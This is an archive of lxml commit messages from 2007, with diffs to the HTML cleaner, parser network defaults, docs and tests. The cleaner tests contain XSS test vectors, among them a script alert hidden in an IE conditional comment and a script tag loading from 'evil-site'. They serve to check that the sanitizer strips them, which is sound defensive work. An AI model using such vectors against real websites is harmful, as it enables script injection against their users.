<20070606081004.E4E4A80CB@code0.codespeak.net> Author: ianb Date: Wed Jun 6 10:10:04 2007 New Revision: 44049 Modified: lxml/branch/html/src/lxml/html/__init__.py Log: Make iter_links also find link in the root element (wouldn't work with iterdescendants). Make function alternatives to the methods use parse() instead of an explicit keyword argument (maybe an explicit option should also be allowed though). 
Made the parser use <span> when possible and necessar Modified: lxml/branch/html/src/lxml/html/__init__.py ============================================================================== --- lxml/branch/html/src/lxml/html/__init__.py (original) +++ lxml/branch/html/src/lxml/html/__init__.py Wed Jun 6 10:10:04 2007 @@ -151,7 +151,7 @@ link you get is exactly the link in the document. """ link_attrs = defs.link_attrs - for el in self.iterdescendants(): + for el in _itertree(self): for attrib in link_attrs: if attrib in el.attrib: yield (el, attrib, el.attrib[attrib], 0) @@ -226,34 +226,42 @@ # make a copy of the document. The problem is it changes the # return type, as it should return the copied document and not a # serialization. Is that odd? - def __init__(self, name, fragment=False, source_class=HtmlMixin): + def __init__(self, name, copy=False, source_class=HtmlMixin): self.name = name - self.fragment = fragment + self.copy = copy self.__doc__ = getattr(source_class, self.name).__doc__ def __call__(self, doc, *args, **kw): - if 'fragment' in kw: - fragment = kw.pop('fragment') - else: - fragment = self.fragment if isinstance(doc, basestring): - if fragment: - doc = parse_element(doc) + if 'copy' in kw: + raise TypeError( + "The keyword 'copy' can only be used with element inputs to %s, not a string input" % self.name) + return_string = True + doc = parse(doc) + else: + if 'copy' in kw: + copy = kw.pop('copy') else: - doc = HTML(doc) + copy = self.copy + return_string = False + if copy: + doc = copy.deepcopy(doc) meth = getattr(doc, self.name) result = meth(*args, **kw) if result is None: - # Then serialize and return - return tostring(doc) + # Then return what we got in + if return_string: + return tostring(doc) + else: + return doc else: return result -find_rel_links = _MethodFunc('find_rel_links') -find_class = _MethodFunc('find_class') -make_links_absolute = _MethodFunc('make_links_absolute') -resolve_base_href = _MethodFunc('resolve_base_href') -iter_links = 
_MethodFunc('iter_links') -rewrite_links = _MethodFunc('rewrite_links') +find_rel_links = _MethodFunc('find_rel_links', copy=False) +find_class = _MethodFunc('find_class', copy=False) +make_links_absolute = _MethodFunc('make_links_absolute', copy=True) +resolve_base_href = _MethodFunc('resolve_base_href', copy=True) +iter_links = _MethodFunc('iter_links', copy=False) +rewrite_links = _MethodFunc('rewrite_links', copy=True) class HtmlComment(etree.CommentBase, HtmlMixin): pass @@ -382,10 +390,21 @@ return body[0] # Now we have a body which represents a bunch of tags which have the # content that was passed in. We will create a fake container, which - # is the body tag, except body implies too much structure. - body.tag = 'div' + # is the body tag, except <body> implies too much structure. + if _contains_block_level_tag(el): + body.tag = 'div' + else: + body.tag = 'span' return body +def _contains_block_level_tag(el): + # FIXME: I could do this with XPath, but would that just be + # unnecessarily slow? + for el in _itertree(el): + if el.tag in defs.block_tags: + return True + return False + def _element_name(el): if isinstance(el, etree.CommentBase): return 'comment' @@ -394,6 +413,16 @@ else: return el.tag +# FIXME: should this be a method? It's convenient, but I can't find a +# method that does something like it. +def _itertree(el): + """ + Return the element's descendants, and the element itself + """ + yield el + for item in el.iterdescendants(): + yield item + def Element(*args, **kw): v = html_parser.makeelement(*args, **kw) return v From ianb at codespeak.net Wed Jun 6 10:11:34 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Wed, 6 Jun 2007 10:11:34 +0200 (CEST) Subject: [Lxml-checkins] r44050 - in lxml/branch/html/src/lxml/html: . 
tests tests/hackers-org-data Message-ID: <20070606081134.F3FCE80CB@code0.codespeak.net> Author: ianb Date: Wed Jun 6 10:11:34 2007 New Revision: 44050 Modified: lxml/branch/html/src/lxml/html/clean.py lxml/branch/html/src/lxml/html/tests/hackers-org-data/downlevel-hidden.data lxml/branch/html/src/lxml/html/tests/test_clean.txt lxml/branch/html/src/lxml/html/tests/test_rewritelinks.txt Log: Fix some cleaning-related tests, mostly updating things that got changed when I wasn't running these tests. Also notice IE conditional comments Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Wed Jun 6 10:11:34 2007 @@ -40,6 +40,9 @@ _whitespace_re = re.compile(r'\s+') # FIXME: should data: be blocked? +_conditional_comment_re = re.compile( + r'\[if[\s\n\r]+.*?][\s\n\r]*>', re.I|re.S) + def clean_html(html, **kw): """ Like clean(), but takes a text input document, and returns a text @@ -57,6 +60,10 @@ for item in el.iterdescendants(): yield item +# FIXME: I really have to figure out what a sane set of defaults is +# for these keyword arguments. And is this signature out of control? +# What about if we want things like whitelisting of <object> or other +# controls? Maybe this has to be more than a function. def clean(doc, scripts=True, javascript=True, @@ -141,6 +148,17 @@ This modifies the document *in place*. """ + # IE conditional comments basically embed HTML that the parser doesn't + # normally see. We can't allow anything like that, so we'll kill any + # comments that could be conditional + if not comments: + bad = [] + for el in _itertree(doc): + if (isinstance(el, etree.CommentBase) + and _conditional_comment_re.search(el.text)): + bad.append(el) + for el in bad: + el.drop_element() # First, handle a case that IE treats <image> like <img>, and that can # confuse either this step or later steps. 
for el in doc.xpath('descendant-or-self::image'): @@ -191,6 +209,9 @@ elif new != old: el.text = new if comments or processing_instructions: + # FIXME: why either? I feel like there's some obscure reason + # because you can put PIs in comments...? But I've already + # forgotten it kill_tags.append(etree.Comment) if processing_instructions: kill_tags.append(etree.ProcessingInstruction) @@ -201,8 +222,9 @@ # del el.attrib['xmlns'] if style: kill_tags.append('style') - for el in doc.xpath('descendant-or-self::link[lower-case(@rel)="stylesheet"]'): - el.drop_element() + for el in doc.xpath('descendant-or-self::link'): + if 'stylesheet' in el.attrib.get('rel', '').lower(): + el.drop_element() for el in doc.xpath('descendant-or-self::*[@style]'): del el.attrib['style'] if links: Modified: lxml/branch/html/src/lxml/html/tests/hackers-org-data/downlevel-hidden.data ============================================================================== --- lxml/branch/html/src/lxml/html/tests/hackers-org-data/downlevel-hidden.data (original) +++ lxml/branch/html/src/lxml/html/tests/hackers-org-data/downlevel-hidden.data Wed Jun 6 10:11:34 2007 @@ -1,11 +1,9 @@ Description: Downlevel-Hidden-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. 
As we can see, that probably wouldn't do the job http://ha.ckers.org/xss.html#XSS_Downlevel-Hidden -Options: -comments +Options: -comments, -processing_instructions <div><!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--></div> ---------- -<div>[if gte IE 4]> -<SCRIPT>alert('XSS');</SCRIPT> -<![endif]</div> +<div></div> Modified: lxml/branch/html/src/lxml/html/tests/test_clean.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_clean.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_clean.txt Wed Jun 6 10:11:34 2007 @@ -1,4 +1,4 @@ ->>> from lxml.html import HTML, tostring +>>> from lxml.html import parse, tostring >>> from lxml.html.clean import clean, clean_html >>> from lxml.html import usedoctest >>> doc = '''<html> @@ -52,7 +52,7 @@ <image src="evil!"> </body> </html> ->>> print tostring(HTML(doc)) +>>> print tostring(parse(doc)) <html> <head> <script type="text/javascript" src="evil-site"></script> @@ -78,27 +78,25 @@ <image src="evil!"> </body> </html> ->>> print clean_html(doc) +>>> print clean_html(doc, page_structure=False, safe_attrs_only=False) <html> <head> - <link rel="alternate" type="text/rss" src="evil-rss"> - <style> - body {background-image: url()}; - div {color: }; - </style> + <style>/* deleted */</style> </head> <body> <a href="">a link</a> <a href="#">another link</a> <p>a paragraph</p> <div style="display: none">secret EVIL!</div> + of EVIL! Password: - <blink>annoying EVIL!</blink> + annoying EVIL! <a href="evil-site">spam spam SPAM!</a> <img src="evil!"> </body> </html> ->>> print clean_html(doc, style=True, links=True, add_nofollow=True) +>>> print clean_html(doc, style=True, links=True, add_nofollow=True, +... page_structure=False, safe_attrs_only=False) <html> <head> </head> @@ -107,8 +105,9 @@ <a href="#">another link</a> <p>a paragraph</p> <div>secret EVIL!</div> + of EVIL! Password: - <blink>annoying EVIL!</blink> + annoying EVIL! 
<a href="evil-site" rel="nofollow">spam spam SPAM!</a> <img src="evil!"> </body> Modified: lxml/branch/html/src/lxml/html/tests/test_rewritelinks.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_rewritelinks.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_rewritelinks.txt Wed Jun 6 10:11:34 2007 @@ -75,7 +75,7 @@ is something embedded). It returns a generator of ``(element, attrib, link)``, which is awkward to test here, so we'll make a printer:: - >>> from lxml.html import iter_links + >>> from lxml.html import iter_links, HTML, tostring >>> def print_iter(seq): ... for element, attrib, link, pos in seq: ... if pos: From scoder at codespeak.net Wed Jun 6 19:55:51 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Wed, 6 Jun 2007 19:55:51 +0200 (CEST) Subject: [Lxml-checkins] r44057 - lxml/branch/html/src/lxml/html Message-ID: <20070606175551.4C2A980DD@code0.codespeak.net> Author: scoder Date: Wed Jun 6 19:55:50 2007 New Revision: 44057 Modified: lxml/branch/html/src/lxml/html/clean.py Log: cleanup: replace custom iteration function by call to getiterator(), use sets for kill_tags and remove_tags, avoid XPath calls where iteration is done anyway Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Wed Jun 6 19:55:50 2007 @@ -3,6 +3,11 @@ from lxml.html import defs from lxml.html import parse, tostring +try: + import set +except ImportError: + from sets import Set as set + __all__ = ['clean_html', 'clean', 'autolink', 'autolink_html', 'word_break', 'word_break_html'] @@ -52,14 +57,6 @@ clean(doc, **kw) return tostring(doc) -def _itertree(el): - """ - Return the element's descendants, and the element itself - """ - yield el - for item in el.iterdescendants(): - yield item - # FIXME: I 
really have to figure out what a sane set of defaults is # for these keyword arguments. And is this signature out of control? # What about if we want things like whitelisting of <object> or other @@ -148,12 +145,15 @@ This modifies the document *in place*. """ + if hasattr(doc, 'getroot'): + # ElementTree + doc = doc.getroot() # IE conditional comments basically embed HTML that the parser doesn't # normally see. We can't allow anything like that, so we'll kill any # comments that could be conditional if not comments: bad = [] - for el in _itertree(doc): + for el in doc.getiterator(): if (isinstance(el, etree.CommentBase) and _conditional_comment_re.search(el.text)): bad.append(el) @@ -163,10 +163,10 @@ # confuse either this step or later steps. for el in doc.xpath('descendant-or-self::image'): el.tag = 'img' - kill_tags = [] - remove_tags = list(remove_tags or []) + kill_tags = set() + remove_tags = set(remove_tags or ()) if scripts: - kill_tags.append('script') + kill_tags.add('script') if safe_attrs_only: safe_attrs = set(defs.safe_attrs) for el in doc.getiterator(): @@ -212,58 +212,85 @@ # FIXME: why either? I feel like there's some obscure reason # because you can put PIs in comments...? But I've already # forgotten it - kill_tags.append(etree.Comment) + kill_tags.add(etree.Comment) if processing_instructions: - kill_tags.append(etree.ProcessingInstruction) + kill_tags.add(etree.ProcessingInstruction) ## SB: Does this actually work? Definitely not the right place to do this. # if processing_instructions: # # FIXME: is this really the right place to remove these attributes? 
# for el in doc.xpath('descendant-or-self::*[@xmlns]'): # del el.attrib['xmlns'] if style: - kill_tags.append('style') + kill_tags.add('style') for el in doc.xpath('descendant-or-self::link'): if 'stylesheet' in el.attrib.get('rel', '').lower(): el.drop_element() for el in doc.xpath('descendant-or-self::*[@style]'): del el.attrib['style'] if links: - kill_tags.append('link') + kill_tags.add('link') elif javascript: # FIXME: we should get rid of included stylesheets in this # case, as you can put Javascript in them pass if meta: - kill_tags.append('meta') + kill_tags.add('meta') if page_structure: - remove_tags.extend(['head', 'html', 'title']) + remove_tags.union(('head', 'html', 'title')) if embedded: # FIXME: is <layer> really embedded? - kill_tags.extend(['applet', 'param']) + kill_tags.union(('applet', 'param')) # The alternate contents that are in an iframe are a good fallback: # FIXME: somehow embed seems to be getting data, but from what I # can tell the embed tag is supposed to always be empty - remove_tags.extend(['iframe', 'object', 'embed', 'layer']) + remove_tags.union(('iframe', 'object', 'embed', 'layer')) if frames: - kill_tags.extend(defs.frame_tags) + kill_tags.union(defs.frame_tags) if forms: - remove_tags.extend(['form']) - kill_tags.extend(['button', 'input', 'select', 'textarea']) + remove_tags.add('form') + kill_tags.union(('button', 'input', 'select', 'textarea')) if annoying_tags: - remove_tags.extend(['blink', 'marque']) - bad = [] - for el in _itertree(doc): - if el.tag in kill_tags: - bad.append(el) - for el in bad: + remove_tags.union(('blink', 'marque')) + + _remove = [] + if strip_tags: + _kill = [] + for el in doc.getiterator(): + if el.tag in kill_tags: + _kill.append(el) + elif el.tag in remove_tags: + _remove.append(el) + else: + kill_tags.update(remove_tags) + _kill = [ el for el in doc.getiterator() + if el.tag in kill_tags ] + + if _remove and _remove[0] == doc: + # We have to drop the parent-most tag, which we can't + # do. 
Instead we'll rewrite it: + el = _remove.pop(0) + el.tag = 'div' + el.attrib.clear() + elif _kill and _kill[0] == doc: + # We have to drop the parent-most element, which we can't + # do. Instead we'll clear it: + el = _kill.pop(0) + if el.tag != 'html': + el.tag = 'div' + el.clear() + + for el in _kill: el.drop_element() - if remove_tags: + for el in _remove: + el.drop_tag() + + if False and remove_tags: xpath = ' | '.join([ "descendant-or-self::%s" % tag for tag in remove_tags]) for el in doc.xpath(xpath): if strip_tags: - if el.getparent(): + if el.getparent() is not None: el.drop_tag() else: # We have to drop the parent-most tag, which we can't @@ -273,6 +300,7 @@ else: # FIXME: Should we test if this has been removed because of a parent? el.drop_element() + if remove_unknown_tags: if allow_tags: raise ValueError( @@ -280,7 +308,7 @@ allow_tags = defs.tags if allow_tags: bad = [] - for el in _itertree(doc): + for el in doc.getiterator(): if el.tag not in allow_tags: bad.append(el) for el in bad: From scoder at codespeak.net Thu Jun 7 08:52:46 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 7 Jun 2007 08:52:46 +0200 (CEST) Subject: [Lxml-checkins] r44069 - lxml/trunk/doc Message-ID: <20070607065246.05B1480D1@code0.codespeak.net> Author: scoder Date: Thu Jun 7 08:52:45 2007 New Revision: 44069 Modified: lxml/trunk/doc/build.txt Log: doc: how to use newer libraries on Mac-OS X Modified: lxml/trunk/doc/build.txt ============================================================================== --- lxml/trunk/doc/build.txt (original) +++ lxml/trunk/doc/build.txt Thu Jun 7 08:52:45 2007 @@ -44,7 +44,7 @@ http://codespeak.net/svn/lxml/pyrex/ A subversion checkout of lxml will automatically retrieve the latest Pyrex - as external project source (``svn:externals``). Look out for the ``Pyrex`` + as external project source (``svn:externals``). Look for the ``Pyrex`` directory in the source tree. 
Since version 1.1.2, the lxml source distribution also includes this Pyrex @@ -182,6 +182,26 @@ lxml maintainer. +Providing newer library versions on Mac-OS X +-------------------------------------------- + +The Unix environment in Mac-OS X makes it relatively easy to install +Unix/Linux style package management tools and new software. However, it seems +to be hard to get libraries set up for exclusive usage that Mac-OS X ships in +an older version. The result can be segfaults on this platform that are hard +to track down. + +To make sure the newer libxml2 and libxslt versions are used (e.g. under +fink), you should add the directory where you installed the libraries to the +``DYLD_LIBRARY_PATH`` environment variable. This seems to fix a lot of +problems for users. + +Alternatively, you can build lxml statically. A way to do this on MS Windows +is described in the next section, but it should be easy to adapt it for +Mac-OS. That way, you can always be sure you use the versions you compiled +lxml with, regardless of the runtime environment. + + Static linking on Windows ------------------------- From scoder at codespeak.net Thu Jun 7 09:42:25 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 7 Jun 2007 09:42:25 +0200 (CEST) Subject: [Lxml-checkins] r44070 - lxml/trunk/src/lxml Message-ID: <20070607074225.6416280CE@code0.codespeak.net> Author: scoder Date: Thu Jun 7 09:42:24 2007 New Revision: 44070 Modified: lxml/trunk/src/lxml/builder.py Log: E factory cleanup for lxml.etree, 'parser' keyword argument Modified: lxml/trunk/src/lxml/builder.py ============================================================================== --- lxml/trunk/src/lxml/builder.py (original) +++ lxml/trunk/src/lxml/builder.py Thu Jun 7 09:42:24 2007 @@ -16,9 +16,6 @@ return lambda *args, **kwargs: func(tag, *args, **kwargs) -class _C: - pass - class ElementMaker(object): """Element generator factory. 
@@ -97,7 +94,12 @@ </html> """ - def __init__(self, typemap=None): + def __init__(self, typemap=None, parser=None): + if parser is not None: + self._makeelement = parser.makeelement + else: + self._makeelement = ET.Element + # initialize type map for this element factory if typemap: @@ -121,20 +123,12 @@ attrib[k] = typemap[type(v)](None, v) typemap[dict] = add_dict - def add_elem(elem, item): - elem.append(item) - t = type(ET.Element("tag")) - if t is not type(_C()): - typemap[t] = add_elem - self._typemap = typemap - # print typemap - def __call__(self, tag, *children, **attrib): get = self._typemap.get - elem = ET.Element(tag) + elem = self._makeelement(tag) if attrib: get(dict)(elem, attrib) From scoder at codespeak.net Thu Jun 7 09:43:02 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 7 Jun 2007 09:43:02 +0200 (CEST) Subject: [Lxml-checkins] r44071 - lxml/trunk Message-ID: <20070607074302.9E2B680CE@code0.codespeak.net> Author: scoder Date: Thu Jun 7 09:43:02 2007 New Revision: 44071 Modified: lxml/trunk/TODO.txt Log: 2.0: make Namespace parser local Modified: lxml/trunk/TODO.txt ============================================================================== --- lxml/trunk/TODO.txt (original) +++ lxml/trunk/TODO.txt Thu Jun 7 09:43:02 2007 @@ -58,6 +58,8 @@ * clean up (and remove?) 
duplicated API for extension functions +* allow (and prefer) Namespace classes local to a parser + * remove first 'context' argument from extension functions * find a way to integrate Schematron (if it's available) From scoder at codespeak.net Thu Jun 7 09:43:50 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 7 Jun 2007 09:43:50 +0200 (CEST) Subject: [Lxml-checkins] r44072 - lxml/trunk/src/lxml/tests Message-ID: <20070607074350.F12BA80CE@code0.codespeak.net> Author: scoder Date: Thu Jun 7 09:43:50 2007 New Revision: 44072 Modified: lxml/trunk/src/lxml/tests/test_etree.py lxml/trunk/src/lxml/tests/test_xslt.py Log: disabled some tests on certain libxml2 versions Modified: lxml/trunk/src/lxml/tests/test_etree.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_etree.py (original) +++ lxml/trunk/src/lxml/tests/test_etree.py Thu Jun 7 09:43:50 2007 @@ -390,22 +390,23 @@ xml = u'<!DOCTYPE doc SYSTEM "test"><doc>&myentity;</doc>' self.assertRaises(_LocalException, parse, StringIO(xml), parser) - def test_entity(self): - parse = self.etree.parse - tostring = self.etree.tostring - parser = self.etree.XMLParser(resolve_entities=False) - Entity = self.etree.Entity + if etree.LIBXML_VERSION > (2,6,20): + def test_entity_parse(self): + parse = self.etree.parse + tostring = self.etree.tostring + parser = self.etree.XMLParser(resolve_entities=False) + Entity = self.etree.Entity + + xml = '<!DOCTYPE doc SYSTEM "test"><doc>&myentity;</doc>' + tree = parse(StringIO(xml), parser) + root = tree.getroot() + self.assertEquals(root[0].tag, Entity) + self.assertFalse(root[0].text) + self.assertEquals(root[0].tail, None) + self.assertEquals(root[0].name, "myentity") - xml = '<!DOCTYPE doc SYSTEM "test"><doc>&myentity;</doc>' - tree = parse(StringIO(xml), parser) - root = tree.getroot() - self.assertEquals(root[0].tag, Entity) - self.assertFalse(root[0].text) - self.assertEquals(root[0].tail, None) - 
self.assertEquals(root[0].name, "myentity") - - self.assertEquals('<doc>&myentity;</doc>', - tostring(root)) + self.assertEquals('<doc>&myentity;</doc>', + tostring(root)) def test_entity_append(self): Entity = self.etree.Entity Modified: lxml/trunk/src/lxml/tests/test_xslt.py ============================================================================== --- lxml/trunk/src/lxml/tests/test_xslt.py (original) +++ lxml/trunk/src/lxml/tests/test_xslt.py Thu Jun 7 09:43:50 2007 @@ -37,19 +37,18 @@ def test_xslt_input_none(self): self.assertRaises(TypeError, etree.XSLT, None) - def test_xslt_invalid_stylesheet(self): - if etree.LIBXSLT_VERSION < (1,1,15): - return # no error from libxslt? - - style = self.parse('''\ + if False and etree.LIBXSLT_VERSION >= (1,1,15): + # earlier versions generate no error + if etree.LIBXSLT_VERSION > (1,1,17): + def test_xslt_invalid_stylesheet(self): + style = self.parse('''\ <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> - <xsl:template match="/"> - <xsl:template /> - </xsl:template> + <xsl:stylesheet /> </xsl:stylesheet>''') - self.assertRaises(etree.XSLTParseError, etree.XSLT, style) + self.assertRaises( + etree.XSLTParseError, etree.XSLT, style) def test_xslt_utf8(self): tree = self.parse(u'<a><b>\uF8D2</b><c>\uF8D2</c></a>') @@ -242,13 +241,12 @@ ''', st.tostring(res)) - def test_xslt_parameter_missing(self): - # DISABLED - NOT RELIABLE! - if etree.LIBXSLT_VERSION >= (1,1,18): - return # no error from libxslt? 
- # apply() without needed parameter will lead to XSLTApplyError - tree = self.parse('<a><b>B</b><c>C</c></a>') - style = self.parse('''\ + if etree.LIBXSLT_VERSION < (1,1,18): + # later versions produce no error + def test_xslt_parameter_missing(self): + # apply() without needed parameter will lead to XSLTApplyError + tree = self.parse('<a><b>B</b><c>C</c></a>') + style = self.parse('''\ <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> @@ -256,9 +254,9 @@ </xsl:template> </xsl:stylesheet>''') - st = etree.XSLT(style) - self.assertRaises(etree.XSLTApplyError, - st.apply, tree) + st = etree.XSLT(style) + self.assertRaises(etree.XSLTApplyError, + st.apply, tree) def test_xslt_multiple_parameters(self): tree = self.parse('<a><b>B</b><c>C</c></a>') From scoder at codespeak.net Thu Jun 7 12:53:27 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 7 Jun 2007 12:53:27 +0200 (CEST) Subject: [Lxml-checkins] r44083 - in lxml/trunk: . src/lxml Message-ID: <20070607105327.53F0980D6@code0.codespeak.net> Author: scoder Date: Thu Jun 7 12:53:26 2007 New Revision: 44083 Modified: lxml/trunk/TODO.txt lxml/trunk/src/lxml/parser.pxi Log: network access disabled by default for parsers, some cleanup in parser option code Modified: lxml/trunk/TODO.txt ============================================================================== --- lxml/trunk/TODO.txt (original) +++ lxml/trunk/TODO.txt Thu Jun 7 12:53:26 2007 @@ -73,4 +73,8 @@ * clean support for entities (maybe an Entity element class?) 
-* disable network access in parsers by default + +Changes in 2.0 +-------------- + +* network access in parsers disabled by default Modified: lxml/trunk/src/lxml/parser.pxi ============================================================================== --- lxml/trunk/src/lxml/parser.pxi (original) +++ lxml/trunk/src/lxml/parser.pxi Thu Jun 7 12:53:26 2007 @@ -665,8 +665,9 @@ cdef int _XML_DEFAULT_PARSE_OPTIONS _XML_DEFAULT_PARSE_OPTIONS = ( - xmlparser.XML_PARSE_NOENT | + xmlparser.XML_PARSE_NOENT | xmlparser.XML_PARSE_NOCDATA | + xmlparser.XML_PARSE_NONET | xmlparser.XML_PARSE_COMPACT ) @@ -685,19 +686,19 @@ * attribute_defaults - read default attributes from DTD * dtd_validation - validate (if DTD is available) * load_dtd - use DTD for parsing - * no_network - prevent network access + * no_network - prevent network access (default: True) * ns_clean - clean up redundant namespace declarations * recover - try hard to parse through broken XML * remove_blank_text - discard blank text nodes - * compact - safe memory for short text content (default: on) - * resolve_entities - replace entities by their text value (default: on) + * compact - safe memory for short text content (default: True) + * resolve_entities - replace entities by their text value (default: True) Note that you should avoid sharing parsers between threads. While this is not harmful, it is more efficient to use separate parsers. This does not apply to the default parser. 
""" def __init__(self, attribute_defaults=False, dtd_validation=False, - load_dtd=False, no_network=False, ns_clean=False, + load_dtd=False, no_network=True, ns_clean=False, recover=False, remove_blank_text=False, compact=True, resolve_entities=True): cdef int parse_options @@ -712,14 +713,14 @@ if attribute_defaults: parse_options = parse_options | xmlparser.XML_PARSE_DTDATTR | \ xmlparser.XML_PARSE_DTDLOAD - if no_network: - parse_options = parse_options | xmlparser.XML_PARSE_NONET if ns_clean: parse_options = parse_options | xmlparser.XML_PARSE_NSCLEAN if recover: parse_options = parse_options | xmlparser.XML_PARSE_RECOVER if remove_blank_text: parse_options = parse_options | xmlparser.XML_PARSE_NOBLANKS + if not no_network: + parse_options = parse_options ^ xmlparser.XML_PARSE_NONET if not compact: parse_options = parse_options ^ xmlparser.XML_PARSE_COMPACT if not resolve_entities: @@ -777,7 +778,15 @@ __GLOBAL_PARSER_CONTEXT.setDefaultParser(__DEFAULT_XML_PARSER) -def setDefaultParser(_BaseParser parser=None): +def setDefaultParser(parser): + "Deprecated, please use set_default_parser instead." + set_default_parser(parser) + +def getDefaultParser(): + "Deprecated, please use get_default_parser instead." + return get_default_parser() + +def set_default_parser(_BaseParser parser=None): """Set a default parser for the current thread. This parser is used globally whenever no parser is supplied to the various parse functions of the lxml API. If this function is called without a parser (or if it is @@ -791,24 +800,19 @@ parser = __DEFAULT_XML_PARSER __GLOBAL_PARSER_CONTEXT.setDefaultParser(parser) -def getDefaultParser(): - return __GLOBAL_PARSER_CONTEXT.getDefaultParser() - -def set_default_parser(parser): - "Deprecated, please use setDefaultParser instead." - setDefaultParser(parser) - def get_default_parser(): - "Deprecated, please use getDefaultParser instead." 
- return getDefaultParser() + return __GLOBAL_PARSER_CONTEXT.getDefaultParser() ############################################################ ## HTML parser ############################################################ cdef int _HTML_DEFAULT_PARSE_OPTIONS -_HTML_DEFAULT_PARSE_OPTIONS = \ +_HTML_DEFAULT_PARSE_OPTIONS = ( + htmlparser.HTML_PARSE_RECOVER | + htmlparser.HTML_PARSE_NONET | htmlparser.HTML_PARSE_COMPACT + ) cdef class HTMLParser(_BaseParser): """The HTML parser. This parser allows reading HTML into a normal XML @@ -817,25 +821,25 @@ Available boolean keyword arguments: * recover - try hard to parse through broken HTML (default: True) - * no_network - prevent network access + * no_network - prevent network access (default: True) * remove_blank_text - discard empty text nodes - * compact - safe memory for short text content (default: on) + * compact - safe memory for short text content (default: True) - Note that you should avoid sharing parsers between threads for parformance + Note that you should avoid sharing parsers between threads for performance reasons. 
""" - def __init__(self, recover=True, no_network=False, remove_blank_text=False, + def __init__(self, recover=True, no_network=True, remove_blank_text=False, compact=True): cdef int parse_options _BaseParser.__init__(self) parse_options = _HTML_DEFAULT_PARSE_OPTIONS - if recover: - parse_options = parse_options | htmlparser.HTML_PARSE_RECOVER - if no_network: - parse_options = parse_options | htmlparser.HTML_PARSE_NONET if remove_blank_text: parse_options = parse_options | htmlparser.HTML_PARSE_NOBLANKS + if not recover: + parse_options = parse_options ^ htmlparser.HTML_PARSE_RECOVER + if not no_network: + parse_options = parse_options ^ htmlparser.HTML_PARSE_NONET if not compact: parse_options = parse_options ^ htmlparser.HTML_PARSE_COMPACT From scoder at codespeak.net Thu Jun 7 12:53:50 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 7 Jun 2007 12:53:50 +0200 (CEST) Subject: [Lxml-checkins] r44084 - lxml/branch/html/src/lxml/html Message-ID: <20070607105350.6B4F180D6@code0.codespeak.net> Author: scoder Date: Thu Jun 7 12:53:50 2007 New Revision: 44084 Modified: lxml/branch/html/src/lxml/html/clean.py Log: removed disabled code section Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Thu Jun 7 12:53:50 2007 @@ -284,23 +284,6 @@ for el in _remove: el.drop_tag() - if False and remove_tags: - xpath = ' | '.join([ - "descendant-or-self::%s" % tag - for tag in remove_tags]) - for el in doc.xpath(xpath): - if strip_tags: - if el.getparent() is not None: - el.drop_tag() - else: - # We have to drop the parent-most tag, which we can't - # do. Instead we'll rewrite it: - el.tag = 'div' - el.attrib.clear() - else: - # FIXME: Should we test if this has been removed because of a parent? 
- el.drop_element() - if remove_unknown_tags: if allow_tags: raise ValueError( From scoder at codespeak.net Thu Jun 7 12:58:07 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 7 Jun 2007 12:58:07 +0200 (CEST) Subject: [Lxml-checkins] r44085 - lxml/trunk/doc Message-ID: <20070607105807.9F1AB80D6@code0.codespeak.net> Author: scoder Date: Thu Jun 7 12:58:07 2007 New Revision: 44085 Modified: lxml/trunk/doc/tutorial.txt Log: small tutorial paragraph Modified: lxml/trunk/doc/tutorial.txt ============================================================================== --- lxml/trunk/doc/tutorial.txt (original) +++ lxml/trunk/doc/tutorial.txt Thu Jun 7 12:58:07 2007 @@ -329,11 +329,11 @@ .. _`further iterators`: api.html#iteration - - The ElementTree class ===================== +An ``ElementTree`` is mainly a wrapper around a tree with a root node. + Parsing files and XML literals ============================== From scoder at codespeak.net Thu Jun 7 14:00:52 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Thu, 7 Jun 2007 14:00:52 +0200 (CEST) Subject: [Lxml-checkins] r44088 - lxml/branch/html/src/lxml/html Message-ID: <20070607120052.45CB780D9@code0.codespeak.net> Author: scoder Date: Thu Jun 7 14:00:51 2007 New Revision: 44088 Modified: lxml/branch/html/src/lxml/html/clean.py Log: more cleanup: use sets, precompiled XPath expressions and getiterator() where possible Modified: lxml/branch/html/src/lxml/html/clean.py ============================================================================== --- lxml/branch/html/src/lxml/html/clean.py (original) +++ lxml/branch/html/src/lxml/html/clean.py Thu Jun 7 14:00:51 2007 @@ -48,6 +48,12 @@ _conditional_comment_re = re.compile( r'\[if[\s\n\r]+.*?][\s\n\r]*>', re.I|re.S) +_find_styled_elements = etree.XPath( + "descendant-or-self::*[@style]") + +_find_external_links = etree.XPath( + "descendant-or-self::a[string(@href) and substring(@href,0,1) != '#']") + def clean_html(html, **kw): """ Like 
